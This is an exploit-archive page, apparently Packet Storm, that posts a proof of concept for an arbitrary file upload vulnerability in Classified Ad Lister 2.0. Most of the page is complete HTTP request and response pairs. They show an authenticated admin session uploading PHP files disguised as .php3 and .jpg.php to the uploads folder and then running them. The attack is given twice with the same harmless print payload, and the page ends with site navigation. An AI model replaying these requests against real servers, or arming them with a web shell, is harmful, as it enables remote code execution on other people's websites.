exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Classified Ad Lister 2.0 Arbitrary File Upload

Classified Ad Lister 2.0 Arbitrary File Upload
Posted Apr 1, 2019
Authored by Mehmet Emiroglu

Classified Ad Lister version 2.0 suffers from an arbitrary file upload vulnerability.

tags | exploit, arbitrary, file upload
SHA-256 | 63542f9d1c1104d0942738c1161df7996e1cf20ff40574c1071e3ef5584f6e3b

Classified Ad Lister 2.0 Arbitrary File Upload

Change Mirror Download
===========================================================================================
# Exploit Title: Classified Ad Lister v2.0 - 'uploads' Arbitrary File Upload
# Dork: N/A
# Date: 25-03-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: https://www.netartmedia.net/adlister
# Software Link: https://www.netartmedia.net/adlister
# Version: v2.0
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: Classified Ad Lister is a free, responsive and easy
to install php script
(not using any database, so the installation is as easy as copying the
files to the website or folder you prefer)
which allows to manage and show classified or product listings on a
website.
===========================================================================================
# POC - Arbitrary File Upload
# Parameters : uploads
# POST Method :
http://localhost/classified/admin/uploads/d571bf7952b140d4bff5d1c272e9c992.php3
# Injection Request
POST /classified/admin/upload.php HTTP/1.1
Host: localhost
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 248
Content-Type: multipart/form-data; boundary=0eaa6514f42e46cbb8d84e040ff20287
Cookie:
AuthUser=administrator%7Eda1907216877e31462c14b35db67de32%7E1553706661;
PHPSESSID=banppj2nuinahv1v8itb1c1nan
Origin: http://localhost
Referer: http://localhost/classified/admin/index.php?page=add
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/54.0.2840.99 Safari/537.36

--0eaa6514f42e46cbb8d84e040ff20287
Content-Disposition: form-data; name="myfile[]";
filename="d571bf7952b140d4bff5d1c272e9c992.php3"
Content-Type: application/octet-stream

<?php print(int)0xFFF9999-24 ?>
--0eaa6514f42e46cbb8d84e040ff20287--

# Identification Page
GET /classified/admin/uploads/d571bf7952b140d4bff5d1c272e9c992.php3 HTTP/1.1
Host: localhost
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie:
AuthUser=administrator%7Eda1907216877e31462c14b35db67de32%7E1553706661;
PHPSESSID=banppj2nuinahv1v8itb1c1nan
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/54.0.2840.99 Safari/537.36

# Injection Response
HTTP/1.1 200 OK
Server: Apache/2.4.37 (Win64) PHP/7.2.14
X-Powered-By: PHP/7.2.14
Content-Length: 41
Content-Type: text/html; charset=UTF-8
Date: Wed, 27 Mar 2019 14:46:40 GMT

["d571bf7952b140d4bff5d1c272e9c992.php3"]

# Identification Page
HTTP/1.1 200 OK
Server: Apache/2.4.37 (Win64) PHP/7.2.14
X-Powered-By: PHP/7.2.14
Content-Length: 9
Content-Type: text/html; charset=UTF-8
Date: Wed, 27 Mar 2019 14:46:40 GMT
===========================================================================================
###########################################################################################
===========================================================================================
# Exploit Title: Classified Ad Lister v2.0 - 'uploads' Arbitrary File Upload
# Dork: N/A
# Date: 25-03-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: https://www.netartmedia.net/adlister
# Software Link: https://www.netartmedia.net/adlister
# Version: v2.0
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: Classified Ad Lister is a free, responsive and easy
to install php script
(not using any database, so the installation is as easy as copying the
files to the website or folder you prefer)
which allows to manage and show classified or product listings on a
website.
===========================================================================================
# POC - Arbitrary File Upload
# Parameters : uploads
# POST Method :
http://localhost/classified/admin/uploads/ad14667cae5d4e28bfb5b53df1687ed6.jpg.php
# Injection Request
POST /classified/admin/upload.php HTTP/1.1
Host: localhost
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 251
Content-Type: multipart/form-data; boundary=0eaa6514f42e46cbb8d84e040ff20287
Cookie:
AuthUser=administrator%7Eda1907216877e31462c14b35db67de32%7E1553706661;
PHPSESSID=banppj2nuinahv1v8itb1c1nan
Origin: http://localhost
Referer: http://localhost/classified/admin/index.php?page=add
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/54.0.2840.99 Safari/537.36

--0eaa6514f42e46cbb8d84e040ff20287
Content-Disposition: form-data; name="myfile[]";
filename="ad14667cae5d4e28bfb5b53df1687ed6.jpg.php"
Content-Type: application/octet-stream

<?php print(int)0xFFF9999-24 ?>
--0eaa6514f42e46cbb8d84e040ff20287--

# Identification Page
GET /classified/admin/uploads/ad14667cae5d4e28bfb5b53df1687ed6.jpg.php
HTTP/1.1
Host: localhost
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie:
AuthUser=administrator%7Eda1907216877e31462c14b35db67de32%7E1553706661;
PHPSESSID=banppj2nuinahv1v8itb1c1nan
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/54.0.2840.99 Safari/537.36

# Injection Response
HTTP/1.1 200 OK
Server: Apache/2.4.37 (Win64) PHP/7.2.14
X-Powered-By: PHP/7.2.14
Content-Length: 44
Content-Type: text/html; charset=UTF-8
Date: Wed, 27 Mar 2019 14:46:40 GMT

["ad14667cae5d4e28bfb5b53df1687ed6.jpg.php"]

# Identification Page
HTTP/1.1 200 OK
Server: Apache/2.4.37 (Win64) PHP/7.2.14
X-Powered-By: PHP/7.2.14
Content-Length: 9
Content-Type: text/html; charset=UTF-8
Date: Wed, 27 Mar 2019 14:46:40 GMT
===========================================================================================
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    0 Files
  • 16
    Apr 16th
    0 Files
  • 17
    Apr 17th
    0 Files
  • 18
    Apr 18th
    0 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close